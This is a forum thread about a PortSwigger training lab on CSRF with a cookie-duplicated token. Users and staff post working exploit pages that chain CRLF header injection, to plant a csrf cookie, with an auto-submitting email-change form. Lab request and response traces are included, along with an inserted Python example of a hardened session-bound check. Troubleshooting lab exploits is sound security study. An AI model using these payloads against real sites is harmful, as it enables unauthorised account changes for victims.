The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.



CSRF LAB BROKEN - CSRF where token is duplicated in cookie

Hamza | Last updated: Jun 03, 2024 09:43AM UTC

Hey Team, when I try to deliver the exploit or test it in my browser, this lab gives me "invalid csrf" although I have checked many times. Given below is my payload.

    <html>
      <body>
        <h1>Hello World!</h1>
        <form action="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/my-account/change-email" method="post">
          <input type="hidden" name="email" value="test5@test.ca">
          <input type="hidden" name="csrf" value="hacked">
        </form>
        <img src="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/?search=hat%0d%0aSet-Cookie:%20csrf=hacked%3b%20SameSite=None" onerror="document.forms[0].submit()">
      </body>
    </html>

Dominyque, PortSwigger Agent | Last updated: Jun 03, 2024 10:19AM UTC

Hi Hamza, As noted in the written solution, your CSRF token needs to have the value of 'fake' in order to solve this lab. If you make this change, are you then able to solve the lab?

Hamza | Last updated: Jun 04, 2024 07:38AM UTC

It still gives me "invalid csrf".

    <html>
      <body>
        <h1>Hello World!</h1>
        <form action="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/my-account/change-email" method="post">
          <input type="hidden" name="email" value="newtest5@test.ca">
          <input type="hidden" name="csrf" value="fake">
        </form>
        <img src="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit()">
      </body>
    </html>

Dominyque, PortSwigger Agent | Last updated: Jun 04, 2024 07:58AM UTC

Hi Hamza, I can confirm that the lab does solve with the given written solution. Have you changed the email address before storing and delivering the exploit to the victim? I was able to solve the lab with the following exploit:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="testy@test.com" />
          <input type="hidden" name="csrf" value="fake" />
          <input type="submit" value="Submit request" />
        </form>
        <img src="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
      </body>
    </html>

P1N | Last updated: Jun 04, 2024 03:38PM UTC

Those are also incorrectly processed by my lab; my payload in search does not get read properly. Everything is fine in the response, but the next request does not execute.

Request:

    GET /?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None HTTP/2

Response:

    HTTP/2 200 OK
    Set-Cookie: LastSearchTerm=test
    Set-Cookie: csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg; SameSite=Non; Secure; HttpOnly
    Set-Cookie: session=kQbiYYVQ0pKfGQeLoFbIWROUaSHoj72m; Secure; HttpOnly; SameSite=None

Next request:

    POST /my-account/change-email HTTP/2
    Host: 0a9800f803d7e13f80da94be00c10097.web-security-academy.net
    Cookie: csrfKey=H5AnPN2IfpZe7bJPos8rqbUcIviDZNlz; session=4VVtwDlnyFLYMXm1voOQaGhQM5dwoav3

The csrf has not changed, why?
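The thread above turns on the server only comparing the `csrf` form field against the `csrfKey` cookie, so a cookie planted through the injected `Set-Cookie` header passes the check. The following Python is an added example, not the lab's or PortSwigger's code: it reconstructs that naive double-submit check beside a session-bound variant that ignores a planted cookie. The cookie names `csrfKey` and `session` come from the request above; `SERVER_KEY`, the session value and the forged request are constructed for the demo.

```python
import hmac
import hashlib

# Constructed demo secret; a real deployment would load a per-server key.
SERVER_KEY = b"constructed-demo-key"


def parse_cookie_header(header):
    """Split a 'Cookie:' header value into a dict, as the lab server would."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def naive_double_submit_check(cookie_header, form_csrf):
    # Lab-style check: form field must equal the csrfKey cookie. Nothing ties
    # the cookie to the session, so any value planted in the victim's cookie
    # jar (here via the reflected Set-Cookie header) is accepted.
    return parse_cookie_header(cookie_header).get("csrfKey") == form_csrf


def session_bound_token(session_id):
    # Hardened variant: derive the token from the session under a server key.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def session_bound_check(cookie_header, form_csrf):
    # Accept only a token matching the current session; csrfKey is ignored.
    session_id = parse_cookie_header(cookie_header).get("session")
    if not session_id or not form_csrf:
        return False
    return hmac.compare_digest(session_bound_token(session_id), form_csrf)


def demo():
    victim_session = "constructed-victim-session"  # unknown to the attacker
    # Request the victim's browser sends after a csrfKey=fake cookie is planted.
    forged = f"csrfKey=fake; session={victim_session}"
    # Request from a legitimate page load carrying the session-bound token.
    good_token = session_bound_token(victim_session)
    legit = f"csrfKey={good_token}; session={victim_session}"
    return {
        "naive_forged": naive_double_submit_check(forged, "fake"),
        "bound_forged": session_bound_check(forged, "fake"),
        "naive_legit": naive_double_submit_check(legit, good_token),
        "bound_legit": session_bound_check(legit, good_token),
    }
```

`demo()` returns `True` for both checks on the legitimate request, but only the naive check accepts the forged one.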

Ben, PortSwigger Agent | Last updated: Jun 05, 2024 08:46AM UTC

Hi both, To confirm, yes, there are some issues following the entirety of the written solution in conjunction with the embedded browser based on some restrictions with cookies. We believe that using a normal version of Chrome should still work at this point in time, however (this is obviously subject to change in the future).
